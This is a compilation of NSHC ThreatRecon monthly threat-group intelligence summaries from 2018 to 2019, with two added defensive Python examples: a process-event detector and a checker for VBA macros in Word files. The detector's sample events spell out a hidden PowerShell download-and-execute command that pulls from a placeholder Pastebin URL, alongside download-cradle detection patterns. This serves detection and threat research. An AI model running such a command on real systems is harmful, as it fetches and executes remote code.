Monthly Threat Actor Group Intelligence Report, June 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from May 21 to June 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02 and SectorA05, were found among the SectorA hacking groups this June. The SectorA groups were mainly active in the Middle East, Southeast Asia, and East Asia in June, targeting countries such as Jordan, the Philippines, South Korea, and Japan.

The SectorA01 group mainly sent spear phishing emails to the Middle East and Southeast Asia which had Microsoft Office document files attached to them. However, in June, another case was discovered where they attached executable type malware that was disguised as a job application form.

The SectorA02 and SectorA05 groups are active mainly for monetary profit, but based on their hacking techniques and malware features, each group is aimed at different targets. The SectorA02 group mainly targets financial companies or companies related to cryptocurrency trading, while the SectorA05 group targets individuals who hold cryptocurrency. In the past, the two groups used spear phishing emails with malicious HWP or executable files attached. Recently, they have also used spear phishing emails impersonating cryptocurrency exchanges or government agencies.

Recently, the SectorA groups have been acting in parallel to target both diplomatic information related to their government and monetary gain. In the past, they mainly targeted financial companies and cryptocurrency exchanges in order to earn monetary benefits, but nowadays they have extended their range of hacking targets to include individual holders of cryptocurrency. Attention is needed as their range of activities expands.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In June, a total of six hacking groups were found to be active in SectorB. Activities of each group were found in the following countries: SectorB01 group activity was discovered in Southeast Asia and Europe, mainly in the Philippines, the Netherlands, and Ukraine. SectorB03 group activity was discovered in the Middle East, mainly in Saudi Arabia. SectorB04 group activity was discovered in East Asia, the Middle East and Europe, mainly in Taiwan, the Philippines, Turkey, and Austria. SectorB06 group activity was discovered in the Middle East, mainly in Turkey and Kazakhstan. SectorB09 group activity was discovered in East Asia and North America, mainly in Japan, Hong Kong, Taiwan and Canada. SectorB14 group activity was discovered in East Asia and North America, mainly in South Korea and the United States.

They maintain their existing hacking techniques – using Spear Phishing emails with malicious Microsoft Office document files attached. Recently, they also attacked Microsoft SharePoint servers and MySQL servers that are connected to the Internet using new vulnerabilities and web shells. In addition, new malware targeting the Linux operating system has been found.

In the past, SectorB groups focused more heavily on North America, but recently attacks in the Middle East, Southeast Asia and East Asia have also increased. We believe this is related to their recent political and diplomatic situations and it is likely that the hacking activities in the Middle East, Southeast Asia, East Asia will continue for the time being.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC08 and SectorC11, were found among the SectorC groups in June. They were active mainly in Europe – Moldova, Ukraine and Germany – countries with which they frequently have political friction. They are constantly using spear phishing emails with malware, but there are gradual changes in the characteristics of the attached executable files. They continue to use open source programs such as the remote control program UltraVNC, and have started to develop their malware from open source code. This is presumably done to bypass security solutions and analyst detection, and it also interferes with intelligence analysis efforts to track the attackers. SectorC groups are expected to continue hacking activities in countries with which they have political and diplomatic conflicts for the time being.

4. SectorD Activity Features

In June, a total of two hacking groups were found among the SectorD groups. They targeted countries in the Middle East with which they have a politically competitive relationship. Activities of each group were found in the following countries: SectorD02 group activity was discovered extensively from Central Asia to the Middle East, mainly in Hong Kong, Sweden, Tajikistan, the United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, the United States and Mexico. SectorD11 group activity was discovered from Central Asia to the Middle East.

They are constantly using spear phishing emails with Microsoft Office document files attached. In particular, obfuscated macro scripts and PowerShell code are embedded in these document files to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilians who oppose the SectorD government.

Currently, the SectorD hacking groups have increased the frequency of their hacking activities against Western countries. This mainly targets the United States, with which they have political and military disputes, but also includes a pro-American nation in the Middle East. It is likely that the activities of the SectorD hacking groups will depend greatly on how the US exerts its influence and military activities in the future.

5. SectorF Activity Features

The SectorF01 group was discovered performing hacking activities in Southeast Asia, Europe and North America, including Vietnam, the United Kingdom and the United States. They have consistently used spear phishing emails with attached Microsoft Office document files, but recently have also attached compressed files containing obfuscated HTA script files. Using script-based malware bypasses the detection of security solutions, and because running the HTA file launches a normal decoy document, the target is not made suspicious.

Analysis of the recent hacking activity of SectorF01 shows they seem to have two purposes. The first is surveillance of organizations and individuals who are against their government. The second is the collection of high-technology information from advanced countries that are nurturing high-tech and industrial technologies, which assists their government's economic development and industrial upgrading. Recently, the hacking activity of SectorF01 for the purpose of high-tech corporate espionage has been increasing, and it is likely that their activities targeting high-tech companies and countries will continue to increase in the future.

6. SectorH Activity Features

The SectorH01 group appears to be active as a contractor rather than belonging officially to a national security agency. Their hacking activities were found in Southeast Asia and South America, including India and Brazil. They mainly use spear phishing emails with Microsoft Office document files.

In this case, macro scripts within the document files make use of PowerShell to download additional scripts from Pastebin (a text file storage site). This minimizes the exposure of their next stage payload even if their initial malware is detected by a security solution, and it can bypass the detection of security solutions by using an external web site that is open to the Internet for distribution of their malware. The SectorH01 group's hacking activities were mainly carried out against their political competitor, India. However, recently their activities have been found in other regions, and we will continue monitoring them in order to further understand the purpose of the SectorH group.
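The two initial-access chains described in this section (an Office macro launching PowerShell to fetch a second stage from Pastebin) and in the SectorF section above (an obfuscated HTA script extracted from an archive and run by mshta.exe) both leave a characteristic parent/child process trail. The detection logic below is an added example written for this page; it is not code from NSHC or the ThreatRecon Team. The process-creation events are constructed to resemble Windows process-creation telemetry (Sysmon Event ID 1 style fields) and the Pastebin URL and file paths in them are placeholders, not indicators from the report.

```python
"""Flag Office -> script host download chains and HTA execution from temp paths.

Added example for the ThreatRecon summaries; events below are constructed
sample telemetry (parent image, image, command line), not real data.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office and HWP processes that should rarely spawn a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "hwp.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}
# Paste site used as a second-stage host in the SectorH01 case.
PASTE_SITES = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.I)
# Common PowerShell download/execute primitives ("download cradle").
DOWNLOAD_PRIMITIVES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|net\.webclient", re.I)
# Locations where archive tools and browsers drop extracted/downloaded files.
TEMP_DIRS = re.compile(
    r"\\(?:appdata\\local\\temp|windows\\temp|users\\[^\\]+\\downloads)\\", re.I)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> List[str]:
    """Return the names of every rule the event matches, in evaluation order."""
    parent, image, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line
    findings = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")
        if DOWNLOAD_PRIMITIVES.search(cmd):
            findings.append("download-cradle")
        if PASTE_SITES.search(cmd):
            findings.append("pastebin-second-stage")
    if image == "mshta.exe" and re.search(r"\.hta\b", cmd, re.I) and TEMP_DIRS.search(cmd):
        findings.append("hta-from-temp")
    return findings


def severity(findings: List[str]) -> Optional[str]:
    """Map rule hits to a triage level; None means nothing matched."""
    if "pastebin-second-stage" in findings or "hta-from-temp" in findings:
        return "high"
    if "download-cradle" in findings:
        return "medium"
    return "low" if findings else None


def triage(events: List[ProcessEvent]) -> List[Tuple[int, str, List[str]]]:
    """(index, severity, findings) for every event that matched at least one rule."""
    out = []
    for i, ev in enumerate(events):
        f = classify(ev)
        if f:
            out.append((i, severity(f), f))
    return out


# Constructed sample events (placeholders, not indicators from the report).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                 ".DownloadString('https://pastebin.com/raw/PLACEHOLDER')"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe C:\Users\alice\AppData\Local\Temp\invoice.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    # Encoded command: the cradle is hidden, only the parent/child rule fires.
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c powershell -w hidden -enc UABMAEEAQwBFAEgATwBMAEQARQBSAA=="),
]

if __name__ == "__main__":
    for idx, level, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {level} {hits}")
```

The last sample event shows why the parent/child rule is kept separate from the command-line rules: once the attacker base64-encodes the PowerShell command, the cradle and the paste-site URL are no longer visible in the command line, but an Office process spawning cmd.exe or powershell.exe is still anomalous and still surfaces at low severity for a human to look at.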

7. Cyber Crime Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In June, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ01 group are mainly found in China, Germany, Slovenia, Sweden, Romania, Russia, US, Brazil, and Costa Rica. The SectorJ01 group uses Spear Phishing emails which have attached documents that utilize known code execution vulnerabilities in Microsoft Office. They also use Cobalt Strike, a common penetration testing tool.

The SectorJ04 group is one of the most active groups in recent years, and its activities have been found in a wide range of regions: Europe, Asia, North and South America, and Africa. Specific countries include Switzerland, Russia, Macedonia, France, Ukraine, Italy, Germany, South Korea, the Philippines, Taiwan, China, the USA, Ecuador, and Senegal.

As in the past, they use spear phishing emails with attached Microsoft Office document files containing embedded macro scripts that download malware. Sometimes they use HTML file attachments too. Recently, the SectorJ04 group hacked organizations such as universities, manufacturing companies, and construction companies, so their targets are no longer limited to financial companies. They have also extended their activities to industrial sectors, where the security posture is typically weaker than in financial companies, which is one way they attempt to generate high profits with low effort. As the SectorJ04 group's hacking targets diversify, it is likely that many cases of financial loss will occur in various countries across many industries.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, May 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from April 21 to May 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA07, were found among the SectorA hacking groups this May. Analysis of the hacking campaigns of SectorA groups over a long period of time reveals that SectorA02, SectorA05 and the newly defined SectorA07 are the most active. The increase in activity of these three groups means that the strategy, hacking purpose and direction of the SectorA groups as a whole have become clear. In addition, it means that the goals of each group in SectorA are now clear.

In the past, the SectorA02 and SectorA05 groups conducted hacking campaigns to collect advanced information related to Korea. However, these groups are currently conducting hacking campaigns to gather information on political activities in Europe, North America, and Southeast Asia, where countries that can influence the political and diplomatic activities of the SectorA government are located.

In May, the newly defined SectorA07 group was identified as a small subgroup of the larger existing SectorA05 group. As a result of analyzing their hacking campaigns, we found that the SectorA07 group is active only for the purpose of collecting financial information from companies located in countries such as South Korea and in Southeast Asia.

The SectorA02 group uses the most diverse hacking strategies and techniques in SectorA. They develop and utilize a variety of hacking strategies and techniques such as simple phishing attacks, spear phishing attacks with malware, and sophisticated social engineering techniques using KakaoTalk (a popular messenger in South Korea). On the other hand, SectorA05 and SectorA07 focused on utilizing spear phishing, which was used frequently in the past, for initial access. They use Microsoft Word or HWP file format malware selectively depending on their target victim.

We observe that SectorA is targeting specific countries less, and is now gathering information on the political and economic activities of various countries related to the SectorA government while capturing financial information in a variety of non-specific countries and regions.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In May, a total of four hacking groups were found to be active in SectorB.

In the Middle East and Southeast Asia, the activity of SectorB01, which had a low frequency of activity over the preceding period, has started to increase. The SectorB01 group used Microsoft Word files exploiting code execution vulnerabilities to execute malware. These files were attached to their spear phishing emails, a technique frequently used by other SectorB groups in the past. In May, the SectorB01 group was also found using malware that runs on the Linux operating system, and it seems they are preparing their capabilities for attacks on various operating systems.

The SectorB03 group, mainly acting in North America, used the remote code execution vulnerability CVE-2019-0604 to attack Microsoft SharePoint servers, which was not used by other hacking groups in the past. They attempted to exploit the vulnerability in order to penetrate the internal network by uploading a WebShell to the target server.

SectorB09 group mainly operates in East Asia, and they use malware with characteristics similar to those used in the past. However, they are using a new hacking technique as they are masquerading their malware as a setup file of a commercial cloud service and then distributing malware to specific targets.

The SectorB16 group, acting mainly in Europe and Southeast Asia, uses only open source tools and known existing vulnerabilities. This characteristic makes it more difficult to detect their hacking activity.

SectorB groups are likely to conduct hacking activities to seize relevant diplomatic information as part of a recent trade war with the United States. As a result, the frequency of SectorB group hacking campaigns is expected to increase.

3. SectorC Activity Features

In May, a total of three hacking groups were found among the SectorC groups. They perform hacking activities mainly in Europe, South America, and Eastern Europe where political friction is frequent.

The SectorC01 group mainly utilized recently produced malware written in the Go language this month. This seems to be a strategic choice, because Go is portable across heterogeneous platforms and widely used.

The SectorC02 group installs information-collecting malware which targets Microsoft Exchange Servers. This is similar to malware used in hacking campaigns in countries located in Europe in the past, and seems to be aimed at stealing e-mail information that can be used for various purposes.

The SectorC08 group conducts intensive hacking activities targeting countries in Eastern Europe where political friction continues. The malicious code found in May was in the form of an executable compressed file, 7ZipSFX, which has the characteristics of using both script files and known normal files together. This is similar to the activities of the SectorC08 group found in the past.

4. SectorD Activity Features

In May, a total of two hacking groups were found among SectorD groups. They perform hacking activities mainly on other Middle Eastern countries which they have political tensions with.

The SectorD01 group mainly conducted hacking activities for the purpose of collecting information using spear phishing emails with Microsoft Excel files that contain malicious macros, and malware using AutoHotKey and TeamViewer, both of which they have not used in the past.

The SectorD02 group also conducted hacking campaigns in the Middle East. They used spear phishing with malware for initial access, just like most other Sector groups. Recently, they used open-source penetration testing tools in their attacks, which seems to be an attempt to not leave traces of attack activity.

5. SectorE Activity Features

In May, a total of three hacking groups were found among the SectorE groups. They perform hacking activities mainly against their rival countries in Central Asia, including Pakistan.

The SectorE02 group typically used spear phishing emails with an attached Microsoft Excel document with malicious macro scripts for initial access.

The SectorE05 group also used Microsoft Word malware for hacking activities, with the internals of these Word files including two files with OLE structures and two files with executable file structures.

Hacking campaigns of the SectorE hacking groups have been concentrated against their competitor countries after a physical military conflict with a political rival country. Due to this political situation, the hacking campaigns of SectorE groups are expected to continue.

6. SectorF Activity Features

In May, the SectorF01 group mainly operated against China, Thailand, Cambodia and India. In addition, hacking campaigns targeting Japanese automotive companies located in Southeast Asia were also found.

The SectorF01 group constantly uses a variety of attack methods: executable files disguised with document file icons, MS Word documents containing VBA macro scripts, RTF files exploiting the CVE-2017-11882 vulnerability, and the WinRAR ACE vulnerability (CVE-2018-20250). Recent hacking activities of the SectorF01 group seem to serve different purposes from the past, as they now also hack various countries and organizations for the economic development of their own country rather than only for political and military information.

This type of hacking activity is similar to previous attempts by another sector, SectorB, to collect technology information from Western countries in order to advance their own technology and economic development. It appears that the SectorF01 group will continue to target various advanced countries and high-technology industries for these purposes.

7. Cyber Crime Groups Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In May, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ04 group were mainly found in Italy, Korea, Romania, South Africa and India, and are targeted at major companies in the financial industry such as banks. The group mainly uses malware in the form of MS Excel files containing macro scripts, and they are using different malware and strategies across Europe and Asia.

The SectorJ09 group hacking activities observed were for hijacking credit card payment information for e-commerce platforms used in online stores in North America and universities in the US and Canada.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, April 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from March 21 to April 20, 2019.


1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA06, were found among the SectorA hacking groups this April.

The scope of activity for SectorA groups found in April is much larger than in the past. Previously, their targets were mainly in East Asia and North America, but now includes many more targets around the world. Traces of hacking activities have been found in the Middle East, including Israel, Turkey and Palestine, East Asia including China and South Korea, Eastern Europe including Ukraine and Slovenia, Southeast Asia including Sri Lanka and Vietnam, and North America including the United States.

The techniques used in the hacking activities found were basically spear phishing with a Hangul Word Processor (HWP) file or Microsoft Word file attached, depending on the target person or organization. We also observed them using the recently discovered WinRAR vulnerability. In addition, a case of a Watering Hole attack was found.

For targets in East Asia, including South Korea, their aim was stealing information related to politics and diplomacy, as well as stealing financial information, represented by virtual currencies. Elsewhere, they were concerned with military information related to weapons and with stealing diplomatic information from countries engaged in diplomatic activities related to SectorA.

The scope of the hacking activities is expected to continue to expand in the future, as the hacking activities of SectorA hacking groups are being carried out for stealing military, diplomatic, political and financial information purposes.


2. SectorB Activity Features

A total of three hacking groups, SectorB01, SectorB06, and SectorB10, were found among the SectorB hacking groups this April.

The hacking activities of SectorB hacking groups have been found in Europe, including Russia, Portugal, Germany and France, and in Asia, including Mongolia, Singapore, Japan, Taiwan, Vietnam and South Korea.

SectorB hacking groups had hacked the internal networks of hardware and software manufacturers in East Asia, using malicious Microsoft RTF files as spear phishing attachments that exploit vulnerabilities frequently used in the past.

These Supply Chain Attacks were linked to cases involving malware in an online game update file developed by an online gaming company in East Asia in March.

They are likely to have done so because the difficulty of directly hacking their target organizations or staff was high enough to warrant other attack routes such as using Supply Chain Attacks to gain access to their targets instead.


3. SectorC Activity Features

A total of three hacking groups, SectorC01, SectorC02, and SectorC10, were found among the SectorC hacking groups this April, with hacking activity targeted at countries in Europe and North America, including Britain, the United States, and Germany.

This April, SectorC hacking groups aimed at stealing information on political and diplomatic activities in European countries. They basically used Spear Phishing techniques with malware and tried to target the presidential elections in certain Eastern European countries.

In addition, SectorC10 hacking activity targeting ICS/SCADA environments has been discovered, and this group has various capabilities and tools, such as WebShells, Backdoors, and performing Credential Harvesting and Remote Command Execution.


4. SectorD Activity Features

A total of four hacking groups, SectorD01, SectorD02, SectorD05 and SectorD12, were found among the SectorD hacking groups this April, with hacking activity targeted at countries in the Middle East, including the Sector's political competitor Saudi Arabia, the United Arab Emirates, Jordan, Iraq and Turkey; at Ukraine, Estonia, Germany, and the United States; as well as at South and East Asia.

SectorD hacking groups are basically using spear phishing techniques with malware; example phishing documents were Word files using confidential U.S. State Department forms. At the same time, malware in the form of compressed files that abused the recently discovered WinRAR vulnerability was also found. SectorD hacking groups mainly collected political, military and diplomatic information from countries in the Middle East that are their political competitors.

However, with the recent declaration of noncompliance with some terms of a nuclear agreement it is part of, hacking aimed at collecting information on government activities is expected to intensify, as conflicts are expected with other countries in many areas, including politics and diplomacy.


5. SectorE Activity Features

A total of two hacking groups, SectorE02 and SectorE05, were found among the SectorE hacking groups this April, with hacking activity targeted at countries including Pakistan, Bangladesh, Sri Lanka, Myanmar and Nepal.

SectorE hacking groups typically use spear phishing as their major hacking technique, attaching web page links or Microsoft Excel documents containing VBA macro scripts to emails that mimic legitimate entities such as foreign governments and the telecommunications and defense industries, or utilizing malicious Microsoft Word files that exploit known code execution vulnerabilities.

The recent spate of military and physical clashes in Pakistan is feared to spread to cyberwarfare. Against this backdrop, the number of hacking activities in neighboring countries is increasing as countries seek to collect information on diplomatic activities related to Central and Southeast Asian countries.


6. SectorF Activity Features

One hacking group, SectorF01, was found among SectorF hacking groups this April, with hacking activity targeted at countries in Southeast Asia including Vietnam, Cambodia, and East Asia including Japan, China, and South Korea.

The SectorF01 Group has previously conducted hacking activities on Southeast Asian countries for its political and military interests, but these days it seems like they are also interested in hacking for economic interests.

Some of these changes in hacking purposes as mentioned earlier have also led to widespread hacking in Southeast Asia and East Asia.

The hacking techniques used by the SectorF01 Group range from watering hole attacks using scripted malicious code that exploits vulnerabilities to Spear phishing hacking techniques where malicious codes exist as attachments.

In addition, they have been using various hacking techniques, scenarios, and strategies to build malware that operates on the Mac operating system in addition to malware that operates on Windows.


7. Cyber Crime Groups Activity Features

A total of three groups, SectorJ02, SectorJ03 and SectorJ04, were found to be responsible for cybercriminal purposes this April.

The targeted areas where these hacking groups operate for cybercrime have been found in the Middle East, including Palestine, the United Arab Emirates and Saudi Arabia; in Europe, including the Netherlands, Luxembourg, Sweden, Macedonia, Russia and Italy; in Asia, including South Korea, Japan and Singapore; and in North and South America, including the United States and Mexico.

Those who hack for financial purposes are also found in a wide range of countries, and they have different purposes from those who are supported by a particular country. However, as of December 2018, the SectorJ03 and SectorJ04 groups have moved their hacking activities to countries in Asia.

For the purpose of cyber crime, hacking groups generally use spear phishing as their major hacking technique, and the attached malware mainly includes macros written to perform malicious functions. In addition, they also attempt to use Windows-based malicious scripts such as PowerShell, VBScript, and BAT.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers.

Monthly Threat Actor Groups Intelligence Report, January 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from December 21, 2018 to January 20, 2019.


1. SectorA Activity Features

A total of three hacking groups were found to be active in SectorA. While their modus operandi had been constant for the past few months, some of it has changed this time.

SectorA01 is still concentrating on financial crime using malware in regions such as Africa, Southeast Asia, and South America for financial gain.

SectorA02 and SectorA05 groups are concentrating on hacking activities aimed at stealing information related to foreign policy of South Korea, and their malware continues to be found in government agencies within South Korea.

But little by little, these hacking groups supported by SectorA have been changing their malware and hacking techniques since 2018. For example, besides using their usual spear phishing with Hangul Word Processor (HWP) files, they have also started to use phishing with malicious scripts instead.

From the hacking activities by SectorA to date, we believe they will continue their activities related to financial crime and espionage aimed at South Korean government agencies.


2. SectorB Activity Features

SectorB targets countries in various regions around the world, and a total of two hacking groups were found to be active. Targets were found in Central Asia, including Kazakhstan, and East Asia, including South Korea.

Groups that were active continued to use spear phishing with Microsoft Word files containing macros, and also made use of code execution vulnerabilities in Microsoft Office software.

From the hacking activities by SectorB to date, we believe that their targets will continue to include European and Oceanian countries for the purpose of stealing high-tech information.


3. SectorC Activity Features

SectorC targets included countries in Eastern Europe including Ukraine, Poland, Macedonia, and North America including the United States. Three hacking groups were found to be active.

Although hacking groups supported by SectorC are characterized by very fast technological and strategic changes, their malware continues to carry identifying characteristics of previous versions.

Their activities in Eastern Europe seem to be aimed at stealing information on military activities related to the North Atlantic Treaty Organization (NATO) and their activities in North America seem to be aimed at stealing information related to government activities.

Since SectorC is currently engaged in hacking activities in Eastern Europe and North America, it seems likely that their political and military related espionage will continue in those regions.


4. SectorD Activity Features

SectorD targets included Europe including Belarus, Ukraine, and Sweden, East Asia including South Korea, and the Middle East centering on Saudi Arabia, Turkey, and Oman. Two hacking groups were found to be active.

Outside of the Middle East, their purpose seems to be to steal diplomacy-related information from countries in Europe and East Asia that have political and economic cooperation with countries in the Middle East. In particular, South Korea recently made diplomatic gains in which it agreed to cooperate in seven areas through summit talks with Qatar.

Hacking techniques used by SectorD continue to include spear phishing with Microsoft Word files which contain malicious macro functions.

Based on their hacking activities so far, it seems that SectorD is starting to expand its scope to include hacking countries with political and economic cooperation with Middle Eastern countries, rather than solely targeting countries in the Middle East.


5. SectorE Activity Features

SectorE targets included Pakistan like before, but this time included East Asia including China, Hong Kong, and South Korea. Two hacking groups were found to be active.

We believe that the wider range of hacking activities by SectorE groups is aimed at stealing information on the economic and policy activities of the respective governments in East Asia. China is in the process of implementing "One Belt, One Road" in Southeast Asia, and South Korea and Russia are countries known to be exporting military arms to SectorE.

Hacking techniques used by SectorE continue to include spear phishing with Microsoft Word files which exploit known code execution vulnerabilities.

Based on their hacking activities so far, it seems that SectorE is targeting countries for the purpose of stealing information related to economic and foreign policy, and targeting Pakistan for politically motivated purposes.


6. SectorF Activity Features

SectorF targets were in Southeast Asia including Vietnam. Similar to November and December 2018, their purpose seems to be stealing information related to political activities from special-purpose personnel operating inside the countries of Southeast Asia.

SectorF groups use spear phishing with links to download malicious Microsoft Word files. Depending on the target, they choose either to use code execution vulnerabilities or to embed malicious macros in the Microsoft Word file.

From their hacking activities over the last three months, it seems that SectorF will continue to target special-purpose personnel in Vietnam, and that they will also continue to use other techniques such as watering hole attacks.


7. SectorH Activity Features

SectorH seems to have a contractual relationship for a particular purpose rather than serving as a government organization of a particular country. Their recent hacking activities are extensive, ranging from Northern European countries including Lithuania to East Asian countries including China and South Korea.

However, based on their hacking techniques and malware, the group seems more focused on cybercrime activities to steal financial information, and only carries out hacking activities to steal information related to political, economic and diplomatic government activity on an ad hoc basis.

Based on their hacking activities so far, which have very different purposes and interests depending on the target, we will need to continue observing their hacking activity in order to have enough confidence to judge their primary purpose.


The full report detailing each event together with IOCs and recommendations is available to existing NSHC ThreatRecon customers.

Monthly Threat Actor Groups Intelligence Report, December 2018

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the Threat Recon Team, based on data and information collected from November 21 to December 20, 2018.


1. SectorA Activity Features

A total of four hacking groups were found to be active within SectorA.

Among this detected activity, SectorA05 activity was relatively more intense than others and all SectorA05 activity was highly related to political hacking aimed at South Korea.

There are two main purposes of hacking by SectorA for the month, which can be distinguished by activity aimed at Korea and activity aimed at other countries.

The first is hacking activity targeting financial institutions overseas, and virtual currency exchanges and individual traders in South Korea. This is used to overcome financial and economic sanctions that are currently ongoing against SectorA. The second is hacking activity related to the more traditional espionage aimed at stealing information related to South Korea’s political and diplomatic activities.

Although malware and hacking techniques used by SectorA differ depending on the target, SectorA consistently targets individuals who belong to target organizations by utilizing Spear Phishing with malicious documents attached.

One of their strategies, using Cloud services as their C2 server for hacking activities, is used against both overseas and South Korean targets.

Another strategy, utilizing malware in the form of document reader files, differs depending on the target – overseas targets receive traditional Microsoft Office files, while South Korean targets will receive Hangeul Word Processor (HWP) files regardless of whether they live in South Korea or overseas.
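The macro-bearing Microsoft Word attachments that this report attributes to several groups (SectorA, SectorB, SectorD, SectorE and SectorF in the sections above and below) can be triaged before delivery with a static check. The following is an added example, not code from NSHC or the report: it inspects an Office Open XML container (.docx/.docm) for an embedded VBA project and flags files whose extension claims a macro-free document while the content carries one. The sample documents are constructed in memory for the example; the part names and content-type strings are the standard OOXML ones.

```python
"""Static triage of Word attachments for embedded VBA projects (added example).

Checks an OOXML container for the parts and content type that only exist when
a VBA project is embedded, and reports an extension/content mismatch.  The
samples built by build_sample() are constructed stand-ins, not real documents.
"""
import io
import zipfile

# Parts that only exist in an OOXML document when a VBA project is embedded.
VBA_PART_MARKERS = ("word/vbaProject.bin", "word/vbaData.xml")
# Content type Word declares for the main part of a macro-enabled document.
MACRO_CONTENT_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CONTENT_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
# Extensions that promise a document without macros.
PLAIN_EXTENSIONS = {".docx", ".dotx"}


def inspect_ooxml(filename: str, data: bytes) -> dict:
    """Return triage findings for one attachment given its name and raw bytes."""
    findings = {"is_ooxml": False, "has_vba": False, "extension_mismatch": False, "reasons": []}
    # Legacy .doc and HWP files are OLE compound files, not ZIPs; they need an OLE parser.
    if not data.startswith(b"PK\x03\x04"):
        findings["reasons"].append("not a ZIP container, so not OOXML")
        return findings
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
            if "[Content_Types].xml" not in names:
                findings["reasons"].append("ZIP without [Content_Types].xml")
                return findings
            findings["is_ooxml"] = True
            content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    except zipfile.BadZipFile:
        findings["reasons"].append("corrupt ZIP container")
        return findings
    vba_parts = sorted(n for n in names if n in VBA_PART_MARKERS)
    if vba_parts:
        findings["has_vba"] = True
        findings["reasons"].append("VBA project part present: " + ", ".join(vba_parts))
    if MACRO_CONTENT_TYPE in content_types:
        findings["has_vba"] = True
        findings["reasons"].append("macro-enabled content type declared")
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    if findings["has_vba"] and ext in PLAIN_EXTENSIONS:
        findings["extension_mismatch"] = True
        findings["reasons"].append(f"VBA present but extension {ext} claims a macro-free document")
    return findings


def build_sample(with_vba: bool) -> bytes:
    """Construct a minimal OOXML-like container (constructed test data, not a real document)."""
    main_type = MACRO_CONTENT_TYPE if with_vba else PLAIN_CONTENT_TYPE
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
        + ('<Override PartName="/word/vbaProject.bin" '
           'ContentType="application/vnd.ms-office.vbaProject"/>' if with_vba else "")
        + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            # Stand-in bytes only; a real vbaProject.bin is an OLE stream.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for name, vba in (("report.docx", False), ("resume.docm", True), ("resume.docx", True)):
        print(name, inspect_ooxml(name, build_sample(vba)))
```

Only the container is inspected here; extracting and reading the macro source itself, or handling the OLE-based legacy .doc and HWP formats the report also mentions, needs an OLE parser such as the olefile/oletools libraries.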


2. SectorB Activity Features

SectorB targets countries from various regions around the world, and a total of four hacking groups were found to be active.

Targets were found in the Oceania region including Australia, the European region including the United Kingdom, and the East Asian region including South Korea.

